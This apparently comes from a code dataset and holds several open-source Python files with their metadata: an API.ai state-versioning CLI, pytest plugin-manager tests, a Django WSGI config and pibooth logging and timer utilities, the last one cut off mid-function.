text
stringlengths 4
1.02M
| meta
dict |
|---|---|
from homie.main import *
|
{
"content_hash": "8fc77d6f06b51d577e048e3eacdae05b",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 24,
"avg_line_length": 25,
"alnum_prop": 0.76,
"repo_name": "MrBramme/Mqtt-Hyperion-Remote",
"id": "a947c1f888a33acec482d58d5898078d5d98f7da",
"size": "47",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "modules/homie/__init__.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "179781"
}
],
"symlink_target": ""
}
|
import os
import pickle
import requests
import click
from git import Repo
API_AI_HEADERS = None
BASE_URL = 'https://api.api.ai/v1/'
DEV_KEY = None
DEV_TOKEN_ENV_NAME = 'API_AI_DEV_TOKEN'
API_AI_HISTORY_DIR = 'api_ai_history'
API_AI_REPO = '{}/{}'.format(os.getcwd(), API_AI_HISTORY_DIR)
@click.group()
def cli():
pass
@cli.command()
@click.argument('repo_url')
def init(repo_url):
"""
Clones submodule (separate repo) to keep track of API.ai history separately. This is required before use.
"""
# TODO(jhurt): Handle private repos by using user's Github credentials
try:
if requests.head(repo_url).status_code != 200:
print('Cannot reach this URL. Terminating.')
return
except Exception:
# Likely a malformed URL, but requests can throw any number of different URL related Exceptions, so catch all
print('Likely a malformed URL. Terminating.')
return
repo = Repo(os.getcwd())
repo.create_submodule(API_AI_HISTORY_DIR, '{}/{}'.format(os.getcwd(), API_AI_HISTORY_DIR), url=repo_url, branch='master')
print('Submodule added. You may now save/load your state from/to API.ai')
@cli.command()
@click.option('--commit', is_flag=True, help='Automatically commit the saved state.')
@click.option('--push', is_flag=True, help='Automatically push (and commit) the saved state')
def save_state(push, commit):
"""
Saves API.ai state (Intents/Entities) as serialized data to be loaded later
"""
if not environment_valid():
return
print('Saving entire state!')
intents = get_resource_dict('intents')
entities = get_resource_dict('entities')
# 'wb' means write the files in binary mode
with open(API_AI_HISTORY_DIR + '/intents.pickle', 'wb') as f, open(API_AI_HISTORY_DIR + '/entities.pickle', 'wb') as f2:
pickle.dump(intents, f)
pickle.dump(entities, f2)
repo = Repo(API_AI_REPO)
repo.index.add([
API_AI_REPO + '/intents.pickle',
API_AI_REPO + '/entities.pickle'
])
if push:
commit = True
if commit:
repo.index.commit('# Intents: {}, # Entities: {}'.format(len(intents), len(entities)))
if push:
repo.index.push()
@cli.command()
@click.option('--commit-hash', default=None, help="A commit hash to make the state of API.ai match.")
def load_state(commit_hash):
"""
Restores state of all Intents/Entities from commit hash to API.ai
"""
if not environment_valid():
return
repo = Repo(API_AI_REPO)
target_commit = None
# Get the Commit object based on the hash user provided
if commit_hash:
for c in repo.iter_commits():
if c.hexsha == commit_hash:
target_commit = c
break
# User didn't provide a commit hash so show last 10 for them to choose from
if not commit_hash:
# Show last 10 commits from CURRENT BRANCH
commits = list(repo.iter_commits(max_count=10))
for i, commit_obj in enumerate(commits):
print("({}) {} {}".format(i, commit_obj.hexsha, commit_obj.message))
try:
num_pressed = int(input("Press number corresponding to which commit you'd like to load the state from: "))
if 0 <= num_pressed <= min(len(commits) - 1, 9):
target_commit = commits[num_pressed]
else:
raise ValueError
except ValueError:
print('Enter a value between 0-{}. Terminating.'.format(min(len(commits) - 1, 9)))
return
print('Loading entire state! Please be patient.')
intents, entities = None, None
# TODO(jhurt): make this only iterate through the API.ai specific pickle files.
# Maybe put them in their own directory and limit the "tree" path to blobs in that path?
for b in target_commit.tree.blobs:
if b.name == "intents.pickle":
intents = pickle.loads(b.data_stream.read())
if b.name == "entities.pickle":
entities = pickle.loads(b.data_stream.read())
sync_api_ai(intents, entities)
print('Refresh the API.ai dashboard to see changes')
def sync_api_ai(old_intents, old_entities):
cur_intents = get_resource_dict('intents')
cur_entities = get_resource_dict('entities')
cur_intents_ids = { x['id'] for x in cur_intents.values() }
cur_entities_ids = { x['id'] for x in cur_entities.values() }
# TODO(jhurt): Currently deleting everything then recreating everything due to odd behavior regarding IDs.
# Make this more efficient cuz numerous or large Intents/Entities could take a long time to send over the network.
# DELETE all current Intents
for intent_id in cur_intents_ids:
requests.delete(BASE_URL+'intents/'+intent_id, headers=API_AI_HEADERS)
# DELETE all current Entities
for entity_id in cur_entities_ids:
requests.delete(BASE_URL+'entities/'+entity_id, headers=API_AI_HEADERS)
# CREATE all old Intents (will have new IDs now but that's okay)
for intent in old_intents.values():
# Intent object can't have the 'id' attribute for a POST
if intent.get('id') is not None:
del intent['id']
requests.post(BASE_URL+'intents', headers=API_AI_HEADERS, json=intent)
# CREATE all old Entities (will have new IDs now but that's okay)
for entity in old_entities.values():
# Entity object can't have the 'id' attribute for a POST
if entity.get('id') is not None:
del entity['id']
requests.post(BASE_URL+'entities', headers=API_AI_HEADERS, json=entity)
def get_resource_dict(resource):
"""
Meh.
:param resource: either 'intents' or 'entities' as of right now
:return: dict in form { 'id' : resource_dict }
"""
resource_json = requests.get(BASE_URL+resource, headers=API_AI_HEADERS).json()
resources = {}
for d in resource_json:
resources[d['id']] = requests.get(BASE_URL+resource+'/'+d['id'], headers=API_AI_HEADERS).json()
return resources
def environment_valid():
global API_AI_HEADERS
global BASE_URL
global DEV_KEY
global DEV_TOKEN_ENV_NAME
DEV_TOKEN_ENV_NAME = 'API_AI_DEV_TOKEN'
DEV_KEY = os.getenv(DEV_TOKEN_ENV_NAME)
if DEV_KEY is None:
print("Please set environment variable {}".format(DEV_TOKEN_ENV_NAME))
return False
API_AI_HEADERS = {'Authorization' : 'Bearer {}'.format(DEV_KEY)}
repo = Repo(os.getcwd())
found_submodule = False
for module in repo.submodules:
if module.name == API_AI_HISTORY_DIR:
found_submodule = True
if not found_submodule:
print("Re-run tool with 'init <REPO_URL>' command where <REPO_URL> is a "
"public Github repo where you would like to save your API.ai history.")
return False
return True
if __name__ == '__main__':
cli()
|
{
"content_hash": "923323b6f1073fd4313086592aef4d0e",
"timestamp": "",
"source": "github",
"line_count": 178,
"max_line_length": 125,
"avg_line_length": 38.67977528089887,
"alnum_prop": 0.639360929557008,
"repo_name": "CamelCaseNotation/api-ai-git",
"id": "5ac30fa325a7cd55d5294892be1cced2dc78966f",
"size": "6935",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "api-ai-git.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "6935"
}
],
"symlink_target": ""
}
|
import pytest, py, os
from _pytest.core import PluginManager
from _pytest.core import MultiCall, HookRelay, varnames
class TestBootstrapping:
def test_consider_env_fails_to_import(self, monkeypatch):
pluginmanager = PluginManager()
monkeypatch.setenv('PYTEST_PLUGINS', 'nonexisting', prepend=",")
pytest.raises(ImportError, "pluginmanager.consider_env()")
def test_preparse_args(self):
pluginmanager = PluginManager()
pytest.raises(ImportError, """
pluginmanager.consider_preparse(["xyz", "-p", "hello123"])
""")
def test_plugin_prevent_register(self):
pluginmanager = PluginManager()
pluginmanager.consider_preparse(["xyz", "-p", "no:abc"])
l1 = pluginmanager.getplugins()
pluginmanager.register(42, name="abc")
l2 = pluginmanager.getplugins()
assert len(l2) == len(l1)
def test_plugin_prevent_register_unregistered_alredy_registered(self):
pluginmanager = PluginManager()
pluginmanager.register(42, name="abc")
l1 = pluginmanager.getplugins()
assert 42 in l1
pluginmanager.consider_preparse(["xyz", "-p", "no:abc"])
l2 = pluginmanager.getplugins()
assert 42 not in l2
def test_plugin_double_register(self):
pm = PluginManager()
pm.register(42, name="abc")
pytest.raises(ValueError, lambda: pm.register(42, name="abc"))
def test_plugin_skip(self, testdir, monkeypatch):
p = testdir.makepyfile(skipping1="""
import pytest
pytest.skip("hello")
""")
p.copy(p.dirpath("skipping2.py"))
monkeypatch.setenv("PYTEST_PLUGINS", "skipping2")
result = testdir.runpytest("-p", "skipping1", "--traceconfig")
assert result.ret == 0
result.stdout.fnmatch_lines([
"*hint*skipping1*hello*",
"*hint*skipping2*hello*",
])
def test_consider_env_plugin_instantiation(self, testdir, monkeypatch):
pluginmanager = PluginManager()
testdir.syspathinsert()
testdir.makepyfile(xy123="#")
monkeypatch.setitem(os.environ, 'PYTEST_PLUGINS', 'xy123')
l1 = len(pluginmanager.getplugins())
pluginmanager.consider_env()
l2 = len(pluginmanager.getplugins())
assert l2 == l1 + 1
assert pluginmanager.getplugin('xy123')
pluginmanager.consider_env()
l3 = len(pluginmanager.getplugins())
assert l2 == l3
def test_consider_setuptools_instantiation(self, monkeypatch):
pkg_resources = py.test.importorskip("pkg_resources")
def my_iter(name):
assert name == "pytest11"
class EntryPoint:
name = "pytest_mytestplugin"
dist = None
def load(self):
class PseudoPlugin:
x = 42
return PseudoPlugin()
return iter([EntryPoint()])
monkeypatch.setattr(pkg_resources, 'iter_entry_points', my_iter)
pluginmanager = PluginManager()
pluginmanager.consider_setuptools_entrypoints()
plugin = pluginmanager.getplugin("mytestplugin")
assert plugin.x == 42
def test_consider_setuptools_not_installed(self, monkeypatch):
monkeypatch.setitem(py.std.sys.modules, 'pkg_resources',
py.std.types.ModuleType("pkg_resources"))
pluginmanager = PluginManager()
pluginmanager.consider_setuptools_entrypoints()
# ok, we did not explode
def test_pluginmanager_ENV_startup(self, testdir, monkeypatch):
x500 = testdir.makepyfile(pytest_x500="#")
p = testdir.makepyfile("""
import pytest
def test_hello(pytestconfig):
plugin = pytestconfig.pluginmanager.getplugin('pytest_x500')
assert plugin is not None
""")
monkeypatch.setenv('PYTEST_PLUGINS', 'pytest_x500', prepend=",")
result = testdir.runpytest(p)
assert result.ret == 0
result.stdout.fnmatch_lines(["*1 passed in*"])
def test_import_plugin_importname(self, testdir):
pluginmanager = PluginManager()
pytest.raises(ImportError, 'pluginmanager.import_plugin("qweqwex.y")')
pytest.raises(ImportError, 'pluginmanager.import_plugin("pytest_qweqwx.y")')
reset = testdir.syspathinsert()
pluginname = "pytest_hello"
testdir.makepyfile(**{pluginname: ""})
pluginmanager.import_plugin("pytest_hello")
len1 = len(pluginmanager.getplugins())
pluginmanager.import_plugin("pytest_hello")
len2 = len(pluginmanager.getplugins())
assert len1 == len2
plugin1 = pluginmanager.getplugin("pytest_hello")
assert plugin1.__name__.endswith('pytest_hello')
plugin2 = pluginmanager.getplugin("pytest_hello")
assert plugin2 is plugin1
def test_import_plugin_dotted_name(self, testdir):
pluginmanager = PluginManager()
pytest.raises(ImportError, 'pluginmanager.import_plugin("qweqwex.y")')
pytest.raises(ImportError, 'pluginmanager.import_plugin("pytest_qweqwex.y")')
reset = testdir.syspathinsert()
testdir.mkpydir("pkg").join("plug.py").write("x=3")
pluginname = "pkg.plug"
pluginmanager.import_plugin(pluginname)
mod = pluginmanager.getplugin("pkg.plug")
assert mod.x == 3
def test_consider_module(self, testdir):
pluginmanager = PluginManager()
testdir.syspathinsert()
testdir.makepyfile(pytest_p1="#")
testdir.makepyfile(pytest_p2="#")
mod = py.std.types.ModuleType("temp")
mod.pytest_plugins = ["pytest_p1", "pytest_p2"]
pluginmanager.consider_module(mod)
assert pluginmanager.getplugin("pytest_p1").__name__ == "pytest_p1"
assert pluginmanager.getplugin("pytest_p2").__name__ == "pytest_p2"
def test_consider_module_import_module(self, testdir):
mod = py.std.types.ModuleType("x")
mod.pytest_plugins = "pytest_a"
aplugin = testdir.makepyfile(pytest_a="#")
pluginmanager = PluginManager()
reprec = testdir.getreportrecorder(pluginmanager)
#syspath.prepend(aplugin.dirpath())
py.std.sys.path.insert(0, str(aplugin.dirpath()))
pluginmanager.consider_module(mod)
call = reprec.getcall(pluginmanager.hook.pytest_plugin_registered.name)
assert call.plugin.__name__ == "pytest_a"
# check that it is not registered twice
pluginmanager.consider_module(mod)
l = reprec.getcalls("pytest_plugin_registered")
assert len(l) == 1
def test_config_sets_conftesthandle_onimport(self, testdir):
config = testdir.parseconfig([])
assert config._conftest._onimport == config._onimportconftest
def test_consider_conftest_deps(self, testdir):
mod = testdir.makepyfile("pytest_plugins='xyz'").pyimport()
pp = PluginManager()
pytest.raises(ImportError, "pp.consider_conftest(mod)")
def test_pm(self):
pp = PluginManager()
class A: pass
a1, a2 = A(), A()
pp.register(a1)
assert pp.isregistered(a1)
pp.register(a2, "hello")
assert pp.isregistered(a2)
l = pp.getplugins()
assert a1 in l
assert a2 in l
assert pp.getplugin('hello') == a2
pp.unregister(a1)
assert not pp.isregistered(a1)
pp.unregister(name="hello")
assert not pp.isregistered(a2)
def test_pm_ordering(self):
pp = PluginManager()
class A: pass
a1, a2 = A(), A()
pp.register(a1)
pp.register(a2, "hello")
l = pp.getplugins()
assert l.index(a1) < l.index(a2)
a3 = A()
pp.register(a3, prepend=True)
l = pp.getplugins()
assert l.index(a3) == 0
def test_register_imported_modules(self):
pp = PluginManager()
mod = py.std.types.ModuleType("x.y.pytest_hello")
pp.register(mod)
assert pp.isregistered(mod)
l = pp.getplugins()
assert mod in l
pytest.raises(ValueError, "pp.register(mod)")
mod2 = py.std.types.ModuleType("pytest_hello")
#pp.register(mod2) # double pm
pytest.raises(ValueError, "pp.register(mod)")
#assert not pp.isregistered(mod2)
assert pp.getplugins() == l
def test_canonical_import(self, monkeypatch):
mod = py.std.types.ModuleType("pytest_xyz")
monkeypatch.setitem(py.std.sys.modules, 'pytest_xyz', mod)
pp = PluginManager()
pp.import_plugin('pytest_xyz')
assert pp.getplugin('pytest_xyz') == mod
assert pp.isregistered(mod)
def test_register_mismatch_method(self):
pp = PluginManager(load=True)
class hello:
def pytest_gurgel(self):
pass
pytest.raises(Exception, "pp.register(hello())")
def test_register_mismatch_arg(self):
pp = PluginManager(load=True)
class hello:
def pytest_configure(self, asd):
pass
excinfo = pytest.raises(Exception, "pp.register(hello())")
def test_notify_exception(self, capfd):
pp = PluginManager()
excinfo = pytest.raises(ValueError, "raise ValueError(1)")
pp.notify_exception(excinfo)
out, err = capfd.readouterr()
assert "ValueError" in err
class A:
def pytest_internalerror(self, excrepr):
return True
pp.register(A())
pp.notify_exception(excinfo)
out, err = capfd.readouterr()
assert not err
def test_register(self):
pm = PluginManager(load=False)
class MyPlugin:
pass
my = MyPlugin()
pm.register(my)
assert pm.getplugins()
my2 = MyPlugin()
pm.register(my2)
assert pm.getplugins()[1:] == [my, my2]
assert pm.isregistered(my)
assert pm.isregistered(my2)
pm.unregister(my)
assert not pm.isregistered(my)
assert pm.getplugins()[1:] == [my2]
def test_listattr(self):
plugins = PluginManager()
class api1:
x = 41
class api2:
x = 42
class api3:
x = 43
plugins.register(api1())
plugins.register(api2())
plugins.register(api3())
l = list(plugins.listattr('x'))
assert l == [41, 42, 43]
def test_hook_tracing(self):
pm = PluginManager()
saveindent = []
class api1:
x = 41
def pytest_plugin_registered(self, plugin):
saveindent.append(pm.trace.root.indent)
raise ValueError(42)
l = []
pm.trace.root.setwriter(l.append)
indent = pm.trace.root.indent
p = api1()
pm.register(p)
assert pm.trace.root.indent == indent
assert len(l) == 1
assert 'pytest_plugin_registered' in l[0]
pytest.raises(ValueError, lambda: pm.register(api1()))
assert pm.trace.root.indent == indent
assert saveindent[0] > indent
class TestPytestPluginInteractions:
def test_addhooks_conftestplugin(self, testdir):
newhooks = testdir.makepyfile(newhooks="""
def pytest_myhook(xyz):
"new hook"
""")
conf = testdir.makeconftest("""
import sys ; sys.path.insert(0, '.')
import newhooks
def pytest_addhooks(pluginmanager):
pluginmanager.addhooks(newhooks)
def pytest_myhook(xyz):
return xyz + 1
""")
config = testdir.Config()
config._conftest.importconftest(conf)
print(config.pluginmanager.getplugins())
res = config.hook.pytest_myhook(xyz=10)
assert res == [11]
def test_addhooks_nohooks(self, testdir):
conf = testdir.makeconftest("""
import sys
def pytest_addhooks(pluginmanager):
pluginmanager.addhooks(sys)
""")
res = testdir.runpytest()
assert res.ret != 0
res.stderr.fnmatch_lines([
"*did not find*sys*"
])
def test_namespace_early_from_import(self, testdir):
p = testdir.makepyfile("""
from pytest import Item
from pytest import Item as Item2
assert Item is Item2
""")
result = testdir.runpython(p)
assert result.ret == 0
def test_do_ext_namespace(self, testdir):
testdir.makeconftest("""
def pytest_namespace():
return {'hello': 'world'}
""")
p = testdir.makepyfile("""
from py.test import hello
import py
def test_hello():
assert hello == "world"
assert 'hello' in py.test.__all__
""")
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
"*1 passed*"
])
def test_do_option_postinitialize(self, testdir):
config = testdir.parseconfigure()
assert not hasattr(config.option, 'test123')
p = testdir.makepyfile("""
def pytest_addoption(parser):
parser.addoption('--test123', action="store_true",
default=True)
""")
config._conftest.importconftest(p)
assert config.option.test123
def test_configure(self, testdir):
config = testdir.parseconfig()
l = []
class A:
def pytest_configure(self, config):
l.append(self)
config.pluginmanager.register(A())
assert len(l) == 0
config.pluginmanager.do_configure(config=config)
assert len(l) == 1
config.pluginmanager.register(A()) # leads to a configured() plugin
assert len(l) == 2
assert l[0] != l[1]
config.pluginmanager.do_unconfigure(config=config)
config.pluginmanager.register(A())
assert len(l) == 2
# lower level API
def test_listattr(self):
pluginmanager = PluginManager()
class My2:
x = 42
pluginmanager.register(My2())
assert not pluginmanager.listattr("hello")
assert pluginmanager.listattr("x") == [42]
def test_listattr_tryfirst(self):
class P1:
@pytest.mark.tryfirst
def m(self):
return 17
class P2:
def m(self):
return 23
class P3:
def m(self):
return 19
pluginmanager = PluginManager()
p1 = P1()
p2 = P2()
p3 = P3()
pluginmanager.register(p1)
pluginmanager.register(p2)
pluginmanager.register(p3)
methods = pluginmanager.listattr('m')
assert methods == [p2.m, p3.m, p1.m]
# listattr keeps a cache and deleting
# a function attribute requires clearing it
pluginmanager._listattrcache.clear()
del P1.m.__dict__['tryfirst']
pytest.mark.trylast(getattr(P2.m, 'im_func', P2.m))
methods = pluginmanager.listattr('m')
assert methods == [p2.m, p1.m, p3.m]
def test_namespace_has_default_and_env_plugins(testdir):
p = testdir.makepyfile("""
import pytest
pytest.mark
""")
result = testdir.runpython(p)
assert result.ret == 0
def test_varnames():
def f(x):
i = 3
class A:
def f(self, y):
pass
class B(object):
def __call__(self, z):
pass
assert varnames(f) == ("x",)
assert varnames(A().f) == ('y',)
assert varnames(B()) == ('z',)
class TestMultiCall:
def test_uses_copy_of_methods(self):
l = [lambda: 42]
mc = MultiCall(l, {})
repr(mc)
l[:] = []
res = mc.execute()
return res == 42
def test_call_passing(self):
class P1:
def m(self, __multicall__, x):
assert len(__multicall__.results) == 1
assert not __multicall__.methods
return 17
class P2:
def m(self, __multicall__, x):
assert __multicall__.results == []
assert __multicall__.methods
return 23
p1 = P1()
p2 = P2()
multicall = MultiCall([p1.m, p2.m], {'x': 23})
assert "23" in repr(multicall)
reslist = multicall.execute()
assert len(reslist) == 2
# ensure reversed order
assert reslist == [23, 17]
def test_keyword_args(self):
def f(x):
return x + 1
class A:
def f(self, x, y):
return x + y
multicall = MultiCall([f, A().f], dict(x=23, y=24))
assert "'x': 23" in repr(multicall)
assert "'y': 24" in repr(multicall)
reslist = multicall.execute()
assert reslist == [24+23, 24]
assert "2 results" in repr(multicall)
def test_keyword_args_with_defaultargs(self):
def f(x, z=1):
return x + z
reslist = MultiCall([f], dict(x=23, y=24)).execute()
assert reslist == [24]
reslist = MultiCall([f], dict(x=23, z=2)).execute()
assert reslist == [25]
def test_tags_call_error(self):
multicall = MultiCall([lambda x: x], {})
pytest.raises(TypeError, "multicall.execute()")
def test_call_subexecute(self):
def m(__multicall__):
subresult = __multicall__.execute()
return subresult + 1
def n():
return 1
call = MultiCall([n, m], {}, firstresult=True)
res = call.execute()
assert res == 2
def test_call_none_is_no_result(self):
def m1():
return 1
def m2():
return None
res = MultiCall([m1, m2], {}, firstresult=True).execute()
assert res == 1
res = MultiCall([m1, m2], {}).execute()
assert res == [1]
class TestHookRelay:
def test_happypath(self):
pm = PluginManager()
class Api:
def hello(self, arg):
"api hook 1"
mcm = HookRelay(hookspecs=Api, pm=pm, prefix="he")
assert hasattr(mcm, 'hello')
assert repr(mcm.hello).find("hello") != -1
class Plugin:
def hello(self, arg):
return arg + 1
pm.register(Plugin())
l = mcm.hello(arg=3)
assert l == [4]
assert not hasattr(mcm, 'world')
def test_only_kwargs(self):
pm = PluginManager()
class Api:
def hello(self, arg):
"api hook 1"
mcm = HookRelay(hookspecs=Api, pm=pm, prefix="he")
pytest.raises(TypeError, "mcm.hello(3)")
def test_firstresult_definition(self):
pm = PluginManager()
class Api:
def hello(self, arg):
"api hook 1"
hello.firstresult = True
mcm = HookRelay(hookspecs=Api, pm=pm, prefix="he")
class Plugin:
def hello(self, arg):
return arg + 1
pm.register(Plugin())
res = mcm.hello(arg=3)
assert res == 4
class TestTracer:
def test_simple(self):
from _pytest.core import TagTracer
rootlogger = TagTracer()
log = rootlogger.get("pytest")
log("hello")
l = []
rootlogger.setwriter(l.append)
log("world")
assert len(l) == 1
assert l[0] == "world [pytest]\n"
sublog = log.get("collection")
sublog("hello")
assert l[1] == "hello [pytest:collection]\n"
def test_indent(self):
from _pytest.core import TagTracer
rootlogger = TagTracer()
log = rootlogger.get("1")
l = []
log.root.setwriter(lambda arg: l.append(arg))
log("hello")
log.root.indent += 1
log("line1")
log("line2")
log.root.indent += 1
log("line3")
log("line4")
log.root.indent -= 1
log("line5")
log.root.indent -= 1
log("last")
assert len(l) == 7
names = [x[:x.rfind(' [')] for x in l]
assert names == ['hello', ' line1', ' line2',
' line3', ' line4', ' line5', 'last']
def test_readable_output_dictargs(self):
from _pytest.core import TagTracer
rootlogger = TagTracer()
out = rootlogger.format_message(['test'], [1])
assert out == ['1 [test]\n']
out2= rootlogger.format_message(['test'], ['test', {'a':1}])
assert out2 ==[
'test [test]\n',
' a: 1\n'
]
def test_setprocessor(self):
from _pytest.core import TagTracer
rootlogger = TagTracer()
log = rootlogger.get("1")
log2 = log.get("2")
assert log2.tags == tuple("12")
l = []
rootlogger.setprocessor(tuple("12"), lambda *args: l.append(args))
log("not seen")
log2("seen")
assert len(l) == 1
tags, args = l[0]
assert "1" in tags
assert "2" in tags
assert args == ("seen",)
l2 = []
rootlogger.setprocessor("1:2", lambda *args: l2.append(args))
log2("seen")
tags, args = l2[0]
assert args == ("seen",)
def test_setmyprocessor(self):
from _pytest.core import TagTracer
rootlogger = TagTracer()
log = rootlogger.get("1")
log2 = log.get("2")
l = []
log2.setmyprocessor(lambda *args: l.append(args))
log("not seen")
assert not l
log2(42)
assert len(l) == 1
tags, args = l[0]
assert "1" in tags
assert "2" in tags
assert args == (42,)
def test_default_markers(testdir):
result = testdir.runpytest("--markers")
result.stdout.fnmatch_lines([
"*tryfirst*first*",
"*trylast*last*",
])
|
{
"content_hash": "144fb7e2c0be203239d5a17f211827bb",
"timestamp": "",
"source": "github",
"line_count": 671,
"max_line_length": 85,
"avg_line_length": 32.80923994038748,
"alnum_prop": 0.560390642743584,
"repo_name": "lotaku/pytest-2.3.5",
"id": "0a18a8efc5e687f0743e2c8639bb14ddf140eafc",
"size": "22015",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "testing/test_core.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "12252"
},
{
"name": "Python",
"bytes": "816338"
}
],
"symlink_target": ""
}
|
"""
WSGI config for septimoarte project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "septimoarte.settings")
application = get_wsgi_application()
|
{
"content_hash": "ab5e97053bfb24eab9aa15318d94a97b",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 78,
"avg_line_length": 24.9375,
"alnum_prop": 0.7744360902255639,
"repo_name": "malon/septimoarte",
"id": "c7e323b445068ca5ccc56c5390483e00682f9801",
"size": "399",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "backend/septimoarte/wsgi.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "107456"
},
{
"name": "HTML",
"bytes": "408918"
},
{
"name": "JavaScript",
"bytes": "416895"
},
{
"name": "Makefile",
"bytes": "420"
},
{
"name": "Python",
"bytes": "5404"
},
{
"name": "Shell",
"bytes": "2546"
}
],
"symlink_target": ""
}
|
"""Pibooth utilities.
"""
import os
import sys
import time
import os.path as osp
import logging
import psutil
import functools
from fnmatch import fnmatchcase
import contextlib
import errno
import subprocess
try:
from itertools import zip_longest, islice
except ImportError:
# Python 2.x fallback
from itertools import izip_longest as zip_longest, islice
LOGGER = logging.getLogger("pibooth")
class BlockConsoleHandler(logging.StreamHandler):
default_level = logging.INFO
pattern_indent = '+< '
pattern_blocks = '| '
pattern_dedent = '+> '
current_indent = ''
def emit(self, record):
cls = self.__class__
if cls.is_debug():
record.msg = '{}{}'.format(cls.current_indent, record.msg)
logging.StreamHandler.emit(self, record)
if cls.current_indent.endswith(cls.pattern_indent):
cls.current_indent = (cls.current_indent[:-len(cls.pattern_indent)] + cls.pattern_blocks)
elif cls.current_indent.endswith(cls.pattern_dedent):
cls.current_indent = cls.current_indent[:-len(cls.pattern_dedent)]
@classmethod
def is_debug(cls):
"""Return True if this handler is set to DEBUG level on the root logger.
"""
for hdlr in logging.getLogger().handlers:
if isinstance(hdlr, cls):
return hdlr.level < logging.INFO
return False
@classmethod
def indent(cls):
"""Begin a new log block.
"""
if cls.is_debug():
cls.current_indent += cls.pattern_indent
@classmethod
def dedent(cls):
"""End the current log block.
"""
if cls.is_debug():
cls.current_indent = (cls.current_indent[:-len(cls.pattern_blocks)] + cls.pattern_dedent)
class PoolingTimer(object):
"""
Timer to be used in a pooling loop to check if timeout has been exceed.
"""
def __init__(self, timeout, start=True):
self.timeout = timeout
self.time = None
self._paused_total = 0
self._paused_time = None
if start:
self.start()
def __enter__(self):
"""Start timer if used as context manager.
"""
self.start()
return self
def __exit__(self, *args):
"""Stop timer if used as context manager.
"""
self.time = None
def start(self):
"""Start the timer.
"""
if self.timeout < 0:
raise ValueError("PoolingTimer cannot be started if timeout is lower than zero")
if self._paused_time:
self._paused_total += time.time() - self._paused_time
self._paused_time = None
else:
self._paused_total = 0
self.time = time.time()
def freeze(self):
"""Pause the timer.
"""
if not self._paused_time:
self._paused_time = time.time()
def remaining(self):
"""Return the remaining seconds.
"""
if self.time is None:
remain = float(self.timeout)
else:
remain = self.timeout + self.paused() - (time.time() - self.time)
if remain < 0.0:
remain = 0.0
return remain
def paused(self):
"""Return the pause duration in seconds.
"""
if self._paused_time:
return self._paused_total + time.time() - self._paused_time
return self._paused_total
def elapsed(self):
"""Return the elapsed seconds.
"""
if self.time is None:
return 0.0
return time.time() - self.time - self.paused()
def is_timeout(self):
"""Return True if the timer is in timeout.
"""
if self.time is None:
raise RuntimeError("PoolingTimer has never been started")
return (time.time() - self.time - self.paused()) > self.timeout
def configure_logging(level=logging.INFO, msgfmt=logging.BASIC_FORMAT, datefmt=None, filename=None):
"""Configure root logger for console printing.
"""
root = logging.getLogger()
if not root.handlers:
# Set lower level to be sure that all handlers receive the logs
root.setLevel(logging.DEBUG)
if filename:
# Create a file handler, all levels are logged
filename = osp.abspath(osp.expanduser(filename))
dirname = osp.dirname(filename)
if not osp.isdir(dirname):
os.makedirs(dirname)
hdlr = logging.FileHandler(filename)
hdlr.setFormatter(logging.Formatter(msgfmt, datefmt))
hdlr.setLevel(logging.DEBUG)
root.addHandler(hdlr)
# Create a console handler
hdlr = BlockConsoleHandler(sys.stdout)
hdlr.setFormatter(logging.Formatter(msgfmt, datefmt))
if level is not None:
hdlr.setLevel(level)
BlockConsoleHandler.default_level = level
root.addHandler(hdlr)
def set_logging_level(level=None):
"""Set/restore the log level of the concole.
:param level: level as defined in the logging package
:type level: int
"""
for hdlr in logging.getLogger().handlers:
if isinstance(hdlr, BlockConsoleHandler):
if level is None:
# Restore the default level
level = BlockConsoleHandler.default_level
hdlr.setLevel(level)
@contextlib.contextmanager
def timeit(description):
"""Measure time execution.
"""
BlockConsoleHandler.indent()
LOGGER.info(description)
start = time.time()
try:
yield
finally:
BlockConsoleHandler.dedent()
LOGGER.debug("took %0.3f seconds", time.time() - start)
def take(n, iterable):
"""Return first n items of the iterable as a list.
"""
return list(islice(iterable, n))
def print_columns_words(words, column_count=3):
"""Print a list of words into columns.
"""
columns, dangling = divmod(len(words), column_count)
iter_words = iter(words)
columns = [take(columns + (dangling > i), iter_words) for i in range(column_count)]
paddings = [max(map(len, column)) for column in columns]
for row in zip_longest(*columns, fillvalue=''):
print(' '.join(word.ljust(pad) for word, pad in zip(row, paddings)))
def pkill(pattern):
"""Kill all process matching the given pattern.
:param pattern: pattern used to match processes
:type pattern: str
"""
for proc in psutil.process_iter():
if fnmatchcase(proc.name(), pattern):
LOGGER.debug("Try to kill process '%s'", proc.name())
try:
proc.kill()
except psutil.AccessDenied:
raise EnvironmentError("Can not kill '{}', root access is required. "
"(kill it manually before starting pibooth)".format(proc.name()))
def memorize(func):
"""Decorator to memorize and return the latest result
of a function.
"""
cache = {}
@functools.wraps(func)
def memorized_func_wrapper(*args, **kwargs):
if func not in cache:
cache[func] = func(*args, **kwargs)
return cache[func]
return memorized_func_wrapper
def open_text_editor(filename):
"""Open a text editor to edit the configuration file.
"""
editors = ['leafpad', 'vi', 'emacs']
for editor in editors:
try:
process = subprocess.Popen([editor, filename])
process.communicate()
return True
except OSError as e:
if e.errno != errno.ENOENT:
# Something else went wrong while trying to run the editor
raise
LOGGER.critical("Can't find installed text editor among %s", editors)
return False
def load_module(path):
"""Load a Python module dynamically.
"""
if not osp.isfile(path):
raise ValueError("Invalid Python module path '{}'".format(path))
dirname, filename = osp.split(path)
modname = osp.splitext(filename)[0]
if dirname not in sys.path:
sys.path.append(dirname)
for hook in sys.meta_path:
loader = hook.find_module(modname, [dirname])
if loader:
